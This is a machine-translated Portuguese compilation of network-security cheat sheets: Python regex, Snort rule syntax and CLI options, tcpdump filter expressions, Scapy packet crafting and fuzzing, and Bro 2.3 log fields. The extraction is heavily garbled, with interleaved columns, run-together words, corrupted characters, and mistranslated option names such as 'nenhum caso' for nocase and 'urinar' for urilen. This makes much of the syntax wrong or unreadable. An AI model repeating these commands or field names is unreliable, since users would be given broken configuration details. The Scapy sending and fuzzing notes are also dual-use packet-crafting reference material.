escape(sequência de caracteres) -> sequência de caracteres
+ 1 ou mais. O mesmo que {1,}
purge() # o re cache
? 0 ou 1. O mesmo que {,1}

RegexObjects (retornados de compile()):

Sequências especiais:

.match(string[, pos, endpos]) -> MatchObject

\Um início de string .search(string[, pos, endpos]) -> MatchObject
\b Corresponde a uma string vazia no limite da palavra (\w+) .findall(string[, pos, endpos]) -> lista de strings
\B Corresponde a uma string vazia que não esteja no limite da palavra .finditer(string[, pos, endpos]) -> iter de MatchObjects
\d Dígito .split(string[, maxsplit]) -> lista de strings
.sub(repl, string[, contagem]) -> string
\D Não-dígito
.subn(repl, string[, contagem]) -> (string, int)
\s Espaço em branco [ \t\n\r\f\v], veja LOCALE,UNICODE .flags # int, passado para compile()
\S Não espaço em branco # int, Número de grupos de captura
\w Alfanumérico: [0-9a-zA-Z_], consulte LOCALE .groups .groupindex # {}, Mapeia nomes de grupos para ints
\W Não alfanumérico .padrão # string, passada para compile()
\Z Fim da sequência
\g<id> Corresponde ao grupo anterior nomeado ou numerado,
MatchObjects (retornados de match() e search()):
'<' e '>' são literais, por exemplo \g<0>
ou \g<nome> (não \g0 ou \gname)
.expand(template) -> string, barra invertida e expansão de grupo
.group([group1...]) -> string ou tupla de strings, 1 por argumento
.groups([padrão]) -> tupla de todos os grupos, não correspondente=padrão
Os escapes de caracteres especiais são muito parecidos com os já existentes .groupdict([default]) -> {}, Grupos nomeados, não correspondentes=default
.start([grupo]) -> int, Início/fim da correspondência de substring por grupo
escapou em literais de string Python. Portanto, regex '\n' é .end([group]) -> int, o grupo assume o valor padrão 0, toda a correspondência
o mesmo que regex '\\n': .span([grupo]) -> tupla (match.start(grupo), match.end(grupo))
.pos int, passado para search() ou match()
int, "
\um sino ASCII (BEL) .endpos .lastindex int, Índice do último grupo de captura correspondente

\f Alimentação de formulário ASCII .lastgroup string, Nome do último grupo de captura correspondente
.ré regex, conforme passado para search() ou match()
\n Avanço de linha ASCII
.corda corda, "
\r Retorno de carro ASCII
\t Guia ASCII
\v Guia vertical ASCII Obtido do python 2.7 http://docs.python.org/library/re.html 're' documentos.
\\ Uma única barra invertida
\xHH Caractere hexadecimal de dois dígitos vai aqui
\OOO Caractere octal de três dígitos (ou apenas use um https://github.com/tartley/python-regex-cheatsheet
zero inicial, por exemplo \0, \09) Versão: v0.3.3
\DD Número decimal de 1 a 99, correspondência
grupo numerado anterior

37
Machine Translated by Google

FOLHA DE DICAS SOBRE AS REGRAS DO SNORT

Formato das regras do Snort:

cabeçalho (corpo;)

Exemplo:

alerta udp 10.10.10.10 qualquer -> 10.10.10.11 53 (msg:”Obtivemos o tráfego DNS”; conteúdo:”|07|foundit|03|
com”; nocase; referência, url:someintel.google.com;classtype: tried_recon; sid:5000000; rev:1;)

Formato do Cabeçalho

Ação Proto SRC Porto SRC Direção Horário de verão Porto DST

Ação Função Proto Direção Significado

alerta alertas e logs de eventos IP (abrange tudo) -> de SRC para DEST
TCP
eventos de logs <>
registro
em qualquer direção
UDP
passar ignora evento

ICMP
derrubar descarta pacote e registra evento

rejeitar Reinicialização TCP da sessão ou Código ICMP Tipo 3 de

Tráfego e logs UDP Porto de origem/destino Significado

ABCD IPA simples

cair descarta pacote sem registrar

ativar ABCD/XX CIDR

descarta pacote sem registrar

dinâmico alerta e ativa uma regra dinâmica [ABCD, ABCE, ABCG] Corresponde a QUALQUER um, não a todos

Modificador Função

nenhum caso; torna a correspondência de conteúdo anterior insensível a maiúsculas e minúsculas, deve ser usado na maioria dos casos para
permitir variações de implementação do fornecedor. NÃO deve ser usado ao tentar corresponder à codificação Base64 ou URL.

bytes brutos; ignora a interpretação do pré-processador do conteúdo da carga útil e procura uma correspondência de carga útil do pacote bruto

desvio: avança o ponteiro para depois de um número de bytes do início do PAYLOAD. Exemplo offset:3;

profundidade: procurará somente a correspondência de conteúdo do início da CARGA ÚTIL até o número de bytes especificado.

distância: avança o ponteiro para depois do número de bytes do final do último CONTENT MATCH Exemplo de distância:12;

dentro de: procurará apenas a correspondência de conteúdo do final da última CORRESPONDÊNCIA DE CONTEÚDO até o número especificado
de bytes

08/02/2013 Criado por Dave Werden 1

30 38
Machine Translated by Google
Opções básicas do corpo

Operador Opções

mensagem: asciitext a ser impresso em alerta ou log, deve estar entre aspas, por exemplo msg:”Mais uma varredura”;

referência: chamará um link para documentação específica de regras incluídas no conjunto de regras do snort (100---999,999) exemplo usando um CVE como
referência:cve,CVE---1999---0105; um exemplo para referência de url:url,someintel.google.com

lado: Número de ID do Snort, <100 reservado, 100--ÿ1000000 (agora 2000000) usado para regras empacotadas, acima disso são
personalizado

revisão: revisão da regra do snort (ou conjunto)

tipo de classe: uma classe nomeada de ataque, construída em uns são associados com uma certa prioridade. Exemplo
classtype:attempted_recon;

prioridade: nível de preocupação, 1 é muito ruim, 2 não tão ruim, 3 informativo, etc.

contente: pesquisa em toda a carga do pacote por uma string ASCII ou uma correspondência “binária”.

édados: Verifica se um certo número de bytes está presente, pode ser feito em relação ao conteúdo anterior adicionando em relação ao final

conteúdo exclusivo: O mesmo que o conteúdo, mas aplica-se especificamente aos uri's

urinar: Especifica um comprimento particular de URI, ou intervalo de comprimentos. Requer HTTP Pre---processador

fluxo: descreve o estado da sessão e a direcionalidade. Inclui opções: to_server from_server, to_client from_client
only_stream no_stream sem estado estabelecido

ipopts: indica a presença de campos de opções no cabeçalho IP. Inclui: eol--- Fim da lista lsrr --- Roteamento de origem solto rr – Rota de registro satid –
ID de fluxo sec – Segurança ssrr – Roteamento de origem estrito ts – Carimbo de data/hora

tamanho: indica um tamanho ou intervalo de tamanho de todo o pacote (inclui cabeçalhos)

bandeiras: indica a presença de TCP Flags. Inclui: A – Ack F – Fin P – Push Snort Cheat Sheet R – Reset S – Syn U – Urgent Data 0 – No Flags (usado em varredura
nula nmap) 1 – Reserved bit 1 (ECN) 2 – Reserved bit 2 (CWR) + ---
*
Várias bandeiras --- Qualquer bandeira! – Não aquela bandeira

ttl: especifica um valor específico de tempo de vida no cabeçalho IP, algum número decimal entre 0 e 255.

marcação: usado para registrar uma série de pacotes em vez de apenas um. Pense nisso como um gatilho. A tag substitui amplamente o activate: à? dynamic: pair.
Parâmetros: session – registra todos os pacotes na sessão que acionou a regra host – registra todos os pacotes de/para o host cujo IP acionou a regra
(isso capturará todo o tráfego, não apenas aquela sessão específica – bom para capturar a atividade de botnet) count – quanto registrar, um número
decimal packets – registra essa quantidade de pacotes seconds – registra todos os pacotes para a sessão ou host por um número especificado de
segundos SRC – registra apenas pacotes da origem DST – registra apenas pacotes do destino

08/02/2013 Criado por Dave Werden 2

31 39
 bufar
Machine Translated by Google
**Snort é um sistema de detecção de intrusão de rede de código aberto, capaz de executar análise de tráfego em tempo real e registro de pacotes em redes IP. Ele pode executar análise de protocolo, conteúdo

pesquisa/correspondência e pode ser usado para detectar uma variedade de ataques e sondas, como estouros de buffer, varreduras de porta furtivas, ataques CGI, sondas SMB, tentativas de impressão digital do SO e muito mais. Snort

usa uma linguagem de regras flexíveis para descrever o tráfego que deve coletar ou passar, bem como um mecanismo de detecção que utiliza uma arquitetura de plug-in modular. O Snort também tem um sistema modular de alerta em tempo real

capacidade, incorporando plugins de alerta e registro para syslog, arquivos de texto ASCII, soquetes UNIX ou XML.

Expressões
Verdadeiro se o endereço de origem DECNET for host, que pode ser um endereço do
host decnet dst Verdadeiro se o endereço de destino DECNET for host host src decnet
formulário ``10

Verdadeiro se o campo de destino IP do pacote for host, que pode ser um

anfitrião decnet anfitrião Verdadeiro se o endereço de origem ou destino DECNET for host host de host de dst
endereço ou um nome

Verdadeiro se o endereço de destino IP do pacote tiver um número de rede de

rede dst rede porta dst porta Verdadeiro se o pacote for ip/tcp ou ip/udp e tiver um valor de porta de destino de porta
líquido

transmissão de éter Verdadeiro se o pacote for um pacote de transmissão Ethernet transmissão de éter Verdadeiro se o pacote for um pacote multicast ethernet

éter dst ehost Verdadeiro se o endereço de destino Ethernet for ehost host éter ehost Verdadeiro se o endereço de origem ou destino da Ethernet for ehost

protocolo proto éter Verdadeiro se o pacote for do tipo protocolo ether éter src ehost Verdadeiro se o endereço de origem Ethernet for ehost

expr relop expr Verdadeiro se a relação for mantida, onde relop é um dos seguintes: >, <, >=, <=, =, != host de gateway Verdadeiro se o pacote usou o host como gateway

transmissão ip de Verdadeiro se o pacote tiver um comprimento maior ou igual a length anfitrião anfitrião Verdadeiro se a origem ou o destino IP do pacote for o host

maior comprimento Verdadeiro se o pacote for um pacote de transmissão IP multidifusão ip Verdadeiro se o pacote for um pacote multicast IP

protocolo ip proto Verdadeiro se o pacote for um pacote ip (veja ip(4P)) do tipo de protocolo protocol ip, arp, rarp, decnet Abreviações para: ether proto p onde p é um dos protocolos acima

lat, moprc, mopdl Abreviações para: ether proto p onde p é um dos protocolos acima menos comprimento Verdadeiro se o pacote tiver um comprimento menor ou igual a length

Verdadeiro se o endereço IP de origem ou de destino do pacote tiver um

rede rede rede rede / ln Verdadeiro se o endereço IP corresponder a uma máscara de rede com len bits de largura
número de rede da rede

rede rede máscara máscara Verdadeiro se o endereço IP corresponder à rede com a máscara de rede específica porta porta Verdadeiro se a porta de origem ou de destino do pacote for a porta

host de origem host Verdadeiro se o campo de origem IP do pacote for host rede src rede Verdadeiro se o endereço de origem IP do pacote tiver um número de rede de net

porta src porta Verdadeiro se o pacote tiver um valor de porta de origem de porta TCP, UDP, ICMP Abreviações para: ip proto p onde p é um dos protocolos acima

Opções
-? Mostrar a declaração de uso do programa e sair ÿÿalertaÿantesÿdeÿpassar Converte regras de descarte, descarte e rejeição em regras de alerta durante a inicialização

ÿUm modo de alerta Alerta usando o modo de alerta especificado -b Pacotes de log em um arquivo formatado tcpdump(1)
ÿConversão de endereço Bÿ Converta todos os endereços IP na rede doméstica para endereços especificados por address-
-C Imprima os dados do caractere somente da carga útil do pacote (sem hexadecimal)
máscara máscara de conversão

ÿc arquivo de Use as regras localizadas no arquivo configÿfile ÿÿconfÿerroÿsaída O mesmo que ÿx

configuração ÿÿcriar arquivo pid Crie um arquivo PID, mesmo quando não estiver no modo Daemon ÿÿcsÿdir <diretório> Diga ao Snort para usar o socket de controle e criar o socket no diretório

Despejar os dados da camada de aplicação ao exibir pacotes em detalhes ou

-D Execute o Snort no modo daemon -d
modo de registro de pacotes

ÿÿdaq <tipo> ÿÿ Selecione o módulo de aquisição de pacotes (o padrão é pcap) ÿÿdaqÿdir <dir> ÿÿ Diga ao Snort onde encontrar o DAQ desejado

daqÿlist [<dir>] Listar módulos de aquisição de pacotes disponíveis no diretório daqÿmode <modo> Selecione o modo de operação do DAQ

ÿÿdumpÿdinâmicoÿregras
ÿÿdaqÿvar <nome=valor> Especificar variável de configuração DAQ extra Carregar uma biblioteca compartilhada do pré-processador dinâmico especificada pelo arquivo
diretório

ÿÿdetecçãoÿdinâmicaÿlib ÿÿdetecçãoÿdinâmicaÿlibÿ
Carregar todas as regras de detecção dinâmica, bibliotecas compartilhadas especificadas no diretório Crie arquivos de regras stub de todas as bibliotecas de regras de detecção dinâmica carregadas
arquivo diretório dir ÿÿ

dynamicÿengineÿlibÿdir
ÿÿarquivo dynamicÿengineÿlib Carrega todas as bibliotecas compartilhadas do mecanismo de detecção dinâmica especificadas no diretório Carregar uma biblioteca compartilhada de regras de detecção dinâmica especificada por arquivo
diretório

ÿÿpré-processadorÿdinâmicoÿ ÿÿpré-processadorÿdinâmicoÿ
Carregue todas as bibliotecas compartilhadas do pré-processador dinâmico especificadas no arquivo lib Alerta de processo, descarte, descarte ou rejeite antes de passar
do diretório diretório libÿdir
-E *SOMENTE WIN32* Registrar alertas no Log de Eventos do Windows -e Exibir/registrar os cabeçalhos dos pacotes da camada de link

Término do sinal após <contagem> retornos de chamada de DAQ_Acquire(), mostrando o

ÿÿhabilitarÿtesteÿemÿlinha Especifique o caminho para o arquivo PID do Snort ÿÿsaídaÿverificação=contagem
tempo que leva desde a sinalização até que DAQ_Stop() seja chamado

-f Ativar buffer de linha PCAP ÿF bpfÿarquivo Ler filtros BPF do arquivo bpf

-G id Use id como um ID de evento base ao registrar eventos grupo ÿg Alterar o grupo/GID em que o Snort é executado para o grupo após a inicialização

Forçar tabelas de hash a serem determinísticas em vez de usar um número aleatório

-H ÿh casaÿrede Defina a "rede doméstica" como rede doméstica
gerador para semente e escala

ÿÿajuda O mesmo queÿ? O mesmo que ÿV -EU

Imprima o nome da interface de recebimento em alertas

-interface i Pacotes Sniff na interface -k modo de soma de verificação Ajuste a funcionalidade de verificação de soma de verificação interna com o modo de alerta

ÿK modo de registro Selecione um modo de registro de pacotes ÿL arquivo de log Defina o nome do arquivo de log binário como binaryÿlogÿfile

ÿl logÿdir Defina o diretório de registro de saída como logÿdir binário ÿÿlogid id O mesmo que ÿG

-M Registrar mensagens do console no syslog quando não estiver executando o modo daemon -m umask Defina a máscara de criação do modo de arquivo para umask

-N Desativar registro de pacotes ÿÿ ÿn contagem de Processar pacotes de contagem de pacotes e sair

noÿinterfaceÿpidfile Não incluir o nome da interface no arquivo PID do Snort pacotes ÿÿnolockÿpidfile Não tente bloquear o arquivo PID do Snort
ÿO Ofuscar os endereços IP quando estiver no modo de despejo de pacotes ASCII -p Desativar o modo promíscuo de detecção

ÿP snap-comprimento Defina o pacote snaplen para snap-length ÿÿpcapÿdir=directory Um diretório para procurar por pcaps

ÿÿpcapÿfile=arquivo Arquivo que contém uma lista de pcaps para ler ÿÿpcapÿfilter=filtro Filtro de estilo shell para aplicar ao obter pcaps de arquivo ou diretório

ÿÿpcapÿlist="lista" Uma lista de pcaps separados por espaços para ler ÿÿpcapÿsemÿfiltro Redefinir para não usar filtro ao obter pcaps de arquivo ou diretório

Se estiver lendo vários pcaps, redefina o snort para o estado pós-configuração antes
ÿÿpcapÿredefinir ÿÿpcapÿmostrar Imprima uma linha dizendo qual pcap está sendo lido no momento
lendo o próximo pcap

ÿÿpcapÿsingle=tcpdumpÿ ÿÿarquivo perfmon

O mesmo que ÿr O mesmo que ÿZ
arquivo nome do

diretório ÿÿpidÿpath Especifique o diretório para o arquivo Snort PID Habilitar operação do modo de teste em linha
caminho ÿÿprocessarÿtodosÿosÿeventos

-Q Habilitar operação em modo inline -q Operação silenciosa

ÿR nome Use o nome como um sufixo para o pidfile do snort ÿr tcpdumpÿarquivo Leia o arquivo formatado tcpdump tcpdump-file

ÿÿrequerÿregraÿsid Exigir um SID para cada regra para ter o limite correto de todas as regras -s Enviar mensagens de alerta para syslog
ÿS variável=valor Defina o nome da variável "variável" para o valor "valor" ÿÿsnaplen snapÿcomprimento Igual a ÿP

O Snort será iniciado no modo de autoteste, verificando todas as linhas de comando fornecidas
-T arquivos de chaves e regras que são entregues a ele e indicando que tudo -t chroot
Altera o diretório raiz do Snort para chroot após a inicialização 40 32
está pronto para prosseguir
Machine Translated by Google

41
Machine Translated by Google

42
Machine Translated by Google
ESCAPADA pacotelife.net
Comandos básicos Especificando Endereços e Valores

ls()
# Endereço IP explícito (use aspas)
Listar todos os protocolos disponíveis e opções de
>>> IP(dst="192.0.2.1")
protocolo lsc()
Listar todas as funções de comando scapy # Nome DNS a ser resolvido no momento da transmissão >>> IP(dst="example.com")
disponíveis conf
Mostrar/definir parâmetros de configuração do scapy
# Rede IP (resulta em um modelo de pacote)
Construindo Pacotes >>> IP(dst="192.0.2.0/24")

# Configurando campos de protocolo >>> # Endereços aleatórios com RandIP() e RandMAC()

ip=IP(src="10.0.0.1") >>> ip.dst="10.0.0.2" >>> IP(dst=RandIP())
>>> Éter(dst=RandMAC())

# Combinando camadas >>>

# Defina um intervalo de números a serem usados (modelo)
l3=IP()/TCP() >>> l2=Ether()/
>>> IP(ttl=(1,30))
l3

# Números aleatórios com RandInt() e RandLong()

# Dividindo camadas >>> l2.getlayer(1) >>> IP(id=RandInt())

<fragmento IP =0 proto=tcp |<TCP |>> >>> l2.getlayer(2)

Enviando Pacotes

<TCP |> enviar(pacote, inter=0, loop=0, contagem=1, iface=N)

Envie um ou mais pacotes na camada três
Exibindo Pacotes sendp(pkt, inter=0, loop=0, count=1, iface=N)
Envie um ou mais pacotes na camada dois
# Mostrar um pacote inteiro >>>
(Ether()/IPv6()).show() sendpfast(pkt, pps=N, mbps=N, loop=0, iface=N)
Envie pacotes muito mais rápido na camada dois usando tcpreplay
###[ Ethernet ]### dst=
ff:ff:ff:ff:ff:ff src= 00:00:00:00:00:00
>>> enviar(IP(dst="192.0.2.1")/UDP(dporta=53))
type= 0x86dd ###[ IPv6 ]### version=
.
6 tc= 0 fl= 0 plen=
Enviados 1 pacote. >>>
Nenhum nh= Nenhum
sendp(Ether()/IP(dst="192.0.2.1")/UDP(dport=53))
Próximo
.
Enviou 1 pacote.

Cabeçalho hlim=
Enviando e recebendo pacotes
64 src= ::1 dst= ::1
sr(pacote, filtro=N, iface=N), srp(…)
Enviar pacotes e receber respostas
sr1(pkt, inter=0, loop=0, count=1, iface=N), srp1(…)
Enviar pacotes e retornar apenas a primeira
# Mostrar tipos de campo com valores padrão >>> ls(UDP())
resposta srloop(pkt, timeout=N, count=N), srploop(…)
sport : ShortEnumField
Enviar pacotes em um loop e imprimir cada resposta
= 1025 (53) dport : ShortEnumField = 53 (53) len
>>> srloop(IP(dst="packetlife.net")/ICMP(), contagem=3)
: Campo curto = Nenhum (None) RECURSO 1: IP / ICMP 174.143.213.184 > 192.168.1.140 RECURSO 1: IP /
chksum : XShortField = Nenhum (Nenhum) ICMP 174.143.213.184 > 192.168.1.140 RECURSO 1 : IP / ICMP 174.143.213.184
> 192.168.1.140
Fuzzing
Pacotes de farejamento
# Campos aleatórios quando aplicável >>>
fuzz(ICMP()).show() sniff(contagem=0, armazenar=1, tempo limite=N)
Registra pacotes fora do fio; retorna uma lista de pacotes quando parado
###[ ICMP ]### type=
<RandByte> código= 227
# Capture até 100 pacotes (ou pare com ctrl-c) >>> pkts=sniff(count=100,
chksum=
iface="eth0") >>> pkts
Nenhum não
utilizado= <RandInt>
<Sniffed: TCP:92 UDP:7 ICMP:1 Outro:0>

por Jeremy Stretch v1.0

43 35
Machine Translated by Google
Bro 2.3 Registros
www.broala.com
conexão.log
Detalhes de conexão IP, TCP, UDP e ICMP TypeDescrip=on
conn.log: estado_conn
Campo
EstadoSignificado
é &meu Carimbo de data/hora
S0 Connec&ona)emptseen,noresponder
uid corda UniqueIDofConnec&on
S1 Connec&onestabelecido,nãoterminado(0bytecounts)
id.orig_h endereço Endereço IP do ponto de extremidade de origem (AKAORIG)
SF Normalestabelecer&termina&on(>0bytecounts)
id.orig_p porta Porta TCP/UDP do ponto de origem (ou código ICMP)
REJ Connec&ona)emptrejeitado
id.resp_h endereço Endereço IP do ponto de extremidade de resposta (AKARESP)
S2 Estabelecido,ORIGa)emptsclose,noreplyfromRESP.
id.resp_p porta Porta TCP/UDP do endpoint de resposta (ou código ICMP)
S3 Estabelecido,RESPa)emptsclose,noplyfromORIG.
proto proto Transportlayerprotocolo de conexão
RSTO estabelecido, ORIGabortado (RST)
serviço corda Protocolo de aplicação detectado dinamicamente, se houver
RSTR estabelecido, RESPabortado (RST)
dura=em intervaloConnec&oncomprimento
RSTOS0 ORIGsentSYNthenRST;noRESPSYN-ACK
bytes_origem contar Originatorpayloadbytes; de números de sequência se
RSTRH RESPsentSYN-ACKthenRST;noORIGSYN
bytes de resp contar TCPResponderpayloadbytes; de números de sequência se
E ORIGsentSYNthenFIN;noRESPSYN-ACK(“meio aberto”)
conn_state corda TCPConnec&onstate (consulte a tabela conn.log:conn_state )
SHR RESPsentSYN-ACKthenFIN;noORIGSYN
local_orig bool SeconnooriginadolocalmenteT; seremotamenteF.
IfSite::local_netsempty,alwaysunset. OTH NoSYN, não fechado. Tráfego intermediário. Conexão par&al.

contagem de bytes perdidos Número de bytes ausentes em lacunas de conteúdo

história corda Connec&onstatehistory (consulte a tabela conn.log:history )

pacotes_origem contar Número de pacotes ORIG

conn.log: histórico
Orig MAIÚSCULAS, Resp minúsculas, uniq-ed
contagem de orig_ip_bytes Número de bytes ORIGIP (via campo de cabeçalho IPtotal_length)

pacotes resp contar Número de pacotes RESP

contagem de resp_ip_bytes Número de bytes RESPIP (via campo de cabeçalho IPtotal_length) LeQerSignificado
conjunto tunnel_parents Se estiver em túnel, conecte-se à IU do tipo capsula&ngpai(s) S aSYN sem o conjunto de bits ACK

origem_cc corda ORIGGeoIPCountryCode O aSYN-ACK(“aperto de mão”)

resp_cc corda RESPGeoIPCountryCode UM apureACK
E pacotecomcargaútil(“dados”)
F pacotecomFINbitset
dns.log R pacotecomRSTbitset
Detalhes da consulta/resposta DNS C pacotecomsomadeverificaçãoruim

Campo TipoDescrip=on EU
Pacote inconsistente (SYN e RST)

é &meCarimbo de data/hora da solicitação DNS

id&id Informações de conexão subjacentes - Veja conn.log

captura_perda.log
Estimativa de perda de pacotes
proto protoProtocolo de DNStransac&on–TCPorUDP
Campo TipoDescrip=on
trans_id conte 16bitiden&fierassignedbyDNSclient;responsesmatch
é &meMedição&mestamp
consulta stringDomainnameassuntodaconsulta
ts_delta intervaloDiferença de tempo em relação à medição anterior
classe q countValue especificando a classe de consulta

qclass_name stringDescrip&venomedaclassedeconsulta(por exemplo,C_INTERNET) par stringNameoftheBroinstancerepor&nglosscountACKvistossemverdadossendo

tipo q countValue especificando o tipo de consulta lacunas

Reconhecido
qtype_name stringNomedotipodeconsulta(por exemplo,A,AAAA,PTR)
acks countTotalnumberofTCPACKs
código r countResponsecodevaluenarespostaDNS
percent_loss stringgaps/acks,asapercentage.Es&mateof
rcode_name string Descrip&venameoftheresponsecode(por exemplo, NOERROR, perda.
NXDOMÍNIO)

Código QR bool Wasthisaquery(T)ouresposta(F)? dhcp.log

AA bool T:serverisauthorita&veforquery
Atividade de concessão DHCP

TC bool T:mensagem foi truncada FieldTypeDescrip=on

RD bool RecursionDesired.T=requestrecursivelookupofquery
é &meTimestampofrequest
id&id Informações de conexão subjacentes - Veja conn.log
RA bool RecursionAvailable.T=servidorsuportaconsultasrecursivas
Mac string Endereço de hardware do cliente
Z countReservedfield, deve ser zero em todas as consultas e respostas
assigned_ip addr Endereço IP real atribuído pelo cliente
respostas vectorListadedescriçõesderecursosemrespostaàconsulta
lease_=me intervaloendereçoIParrenda&eu
TTLs vetorIntervalosdearmazenamentoemcachedasrespostas
trans_id contar Iden&ficadoatribuídopelocliente;respostascorrespondem
rejeitado bool Se a consulta DNS foi rejeitada pelo servidor

44 36
1 ©BroalaLLC. Versão:2.0
Machine Translated by Google
Bro 2.3 Registros
dnp3.log http.log www.broala.com
Protocolo de rede distribuída (controle industrial) Detalhes da solicitação/resposta HTTP

Campo TipoDescrip=on
Campo TypeDescrip=on
é &meCarimbo de horafrequencia
é &meu
id&id Informações de conexão subjacentes - Veja conn.log
id&id TimestampUnderlyingconnec&oninfo-Veja conn.log
profundidade_trans countPipelineddepthintotheconnec&on
fc_solicitação O nome da função de solicitação &na mensagem O
método
fc_resposta cordacorda nome da função de resposta &na mensagem O
hospedar
eu em contar “número de indicação interna” da resposta
você stringHTTPRequestverbo:GET,POST,HEAD,etc.stringValordoURIdocabeçalhoHO
corda

arquivos.log referenciador stringValordocabeçalho“referente”stringValueoftheUser-

agente do usuário AgentheadercountTamanho real do conteúdo não

Resultados da análise de arquivo
compactadodosdados
Campo TipoDescrip=on tamanho_do_corpo_da_solicitação transferidodocliente

é &meCarimbo de data/hora em que o arquivo foi visto pela primeira vez countTamanhorealdescompactadodoconteúdodosdados
resposta_corpo_len transferido do servidor
fluido stringUniqueiden&fierforasinglefile
código_de_status
hosts_tx definir se transferido via rede, host(s) que obtiveram os dados
mensagem_de_status
hosts_rx definir se transferido via rede, host(s) que receberam os dados
código_de_informação countStatuscoderetornadopeloservidorstringStatusmessageretornadopeloservido
conn_uidos definir Connec&onUID(s)atravésdosquaisoarquivofoitransferido
mensagem_de_informação por Última visualização1xx antes da mensagem de resposta
fonte stringAniden&fica&ondafontedosdadosdoarquivo nome do arquivo string do servidor string por meio do cabeçalho do servidor Content-Disposi&on
profundidade countDepthoffilerelatedtosource;ex:SMTPMIMea)achmentdepth;HTTPdepthofthequest Etiquetas definir Indicadores de vários tributos descobertos

nome de usuário corda Se a autenticação básica for executada para a solicitação

analisadores definir Conjunto de tipos de análise feitos durante a análise de arquivo
senha corda Se a autenticação básica for executada para a solicitação
tipo_mime stringO tipo de arquivo, conforme determinado pelas assinaturas do Bro
proxy definir Cabeçalhos que podem indicar um vetor de solicitação
nome do arquivo stringIfavailable,filenamefromsource;frequentemente o
orig_fuids aproximado Um vetor ordenado de IDs exclusivos do arquivo orig
Cabeçalhos “Content-Disposi&on” em protocolos de rede
orig_mime_types vetorUm vetor ordenado de tipos mime de orig
dura=em intervaloAdura&noarquivofoianalisadopara
resp_fuids vetorAnorderedvectoroffileuniqueIDsfromresp
origem_local bool Se transferidos via rede, os dados foram originados localmente?
resp_mime_types vetorVetorordenadodetiposmimederesp
é_origem bool Se transferido via rede, os arquivos foram enviados pelo remetente?

bytes vistos countNumberofbytesfornecidoparaarquivoanalisamecanismo intel.log

bytes totais countTotalnumberofbytesthatshavesincludethefile Acertos em indicadores do framework Intel

missing_bytes countNúmero de bytes no fluxo de arquivo perdidos; por exemplo: descartados

Campo TypeDescrip=on &me
pacotes
é Carimbo de data/hora do hit
overflow_bytes
id&id Informações de conexão subjacentes - Veja conn.log
countNúmerodebytesnãotodosemsequêncianofluxodearquivosentreguesaosanalisadoresdearquivosdevidoaoestourodebufferderemontagem
fluido stringOUIDparaumarquivoassociadoaestehit,sehouver
=medout bool Se a análise do arquivo for feita&meoutpelomenosumavezporarquivo

pai_fuid stringIDassociadoaumarquivodecontêinerdoqualestefoiextraídocomopartedaanálise tipo_mime_de_arquivo_desc_de_arquivo

visto.indicador stringAmitypeseohitestárelacionadoaumarquivostringAdicionalcontextoparaarqu
md5/sha1/ stringMD5/SHA1/SHA256hashoffile,ifenabled
seen.indicator_type stringO tipo de dados que o indicador representa
sha256
visto.onde stringOndeosdadosforamdescobertos
extraído stringLocalfilenameofextractedfiles,ifenabled
fontes definir Fontes que forneceram dados para esta partida

ftp.log
Detalhes da solicitação/resposta de FTP
irc.log
Detalhes de comunicação do IRC
Campo TipoDescrip=on
Campo TipoDescrip=on
é &meComando&mestamp
é &meCarimbo de data/hora
id&id Informações de conexão subjacentes - Veja conn.log
id&id Informações de conexão subjacentes - Veja conn.log
usuário stringNome de usuário para sessão FTP atual
apelido stringApelidodadoparaestaconexão&em
senha stringPasswordforcurrentFTPsession
usuário stringNome de usuário fornecido para esta conexão&on
comando stringCommand emitido pelo
comando stringComandodadopelocliente
argumento clientestringCommandargumentosepresente
valor stringValueparaocomandodadopelocliente
mime_type corda Libmagics detectou o tipo de arquivo se houver uma transferência de arquivo

countTamanhodoarquivotransferido
adicionar stringQualquer dado adicional para o comando
tamanho_do_arquivo

dcc_file_name stringDCCfilenamesolicitado
código_de_resposta countRespostacódigodoservidoremrespostaaocomando

mensagem_de_resposta corda Mensagem de resposta do servidor em resposta ao comando tamanho_do_arquivo_dcc contagemTamanhodatransferênciaDCCconformeindicadopeloremetente

data_channel recordInforma&onaboutthedatachannel(orig,resp,ispassive) dcc_mime_type stringTipo mime farejadodoarquivo

fluido fluido stringFileUniqueID

corda ID único do arquivo
45 37
2 ©BroalaLLC. Versão:2.0
Machine Translated by Google
Bro 2.3 Registros
aviso.log www.broala.com
Avisos registrados

Campo
modbus.log
TipoDescrip=on Solicitações de PLC (controle industrial)
é

id&id
Campo TipoDescrip=on
&meTimestampUnderlyingconnec&oninfo-Veja conn.log
fluido é &meu Solicitação de carimbo de data/hora
corda Fileuniqueiden&fier

file_mime_type stringO tipo de arquivo, conforme determinado pelas assinaturas id&id Informações de conexão subjacentes - Veja conn.log
do Bro função corda Func&onmensagemquefoienviada
arquivo_desc corda Contexto adicional para arquivo, se disponível
exceto=em corda Exce&to sehouverumafalha
proto proto
observação TransportprotocolstringOtipodono&ce snmp.log
mensagem stringMensagem legível para humanos para o Mensagens SNMP
sub no&cestringSubmensagem para o no&ce
Campo TipoDescrip=on
fonte endereço Endereço de origem
é &meu Carimbo de data e hora em que a mensagem foi vista pela primeira vez
horário de verão endereço Des&na&onaddress
id&id Informações de conexão subjacentes - Veja conn.log
p porta Porto associado, se houver
dura=em intervaloTempoentreoprimeiroeúltimopacotevistostringSNMPversão(v1,v2c,v3)
não countAssociatedcountorstatuscode
versão
descrição_de_pares corda Descrip&onforpeerquele que levantou esta not&ia
ações definir A&çõesaplicadasaesteno&ce comunidade corda A cadeia de caracteres da comunidade do primeiro pacote SNMP

obter_solicitações contar Número de pacotes GetRequest/GetNextRequest

suppress_for intervaloComprimentode&medupesdevesersuprimido

descartado bool Se o IP do RC foi bloqueado obter_solicitações_em_massa contagem Número de pacotes GetBulkRequest

obter_respostas contar Número de pacotes GetResponse/Response

raio.log solicitações_definidas contar Número de pacotes SetRequest

Tentativas de autenticação RADIUS string_de_exibição stringAsystemdescrip&ondorespondente

up_since &meu Carimbo de data/hora que o respondente está ausente desde

Campo TypeDescrip=on
é
id&id
&meTimestampoftheauthen&ca&ona)emptUnderlyingconnec&oninfo-
meias.log
Consulte conn.log Solicitações de proxy SOCKS
string de nome de usuárioO nome de usuáriodousuário )emp&ngtoauth
Mac string O endereço MAC do cliente (por exemplo, para wireless)
Campo TipoDescrip=on
remote_ip addr O endereço IP do cliente (por exemplo, para VPN) connect_info é &meu Solicitação de carimbo de data/hora
string Informações adicionais de conexão, se disponíveis
id&id Informações de conexão subjacentes - Veja conn.log
resultado stringSe oa)vazioaceitoudeoufalhou
versão contar Versão do protocolo SOCKS
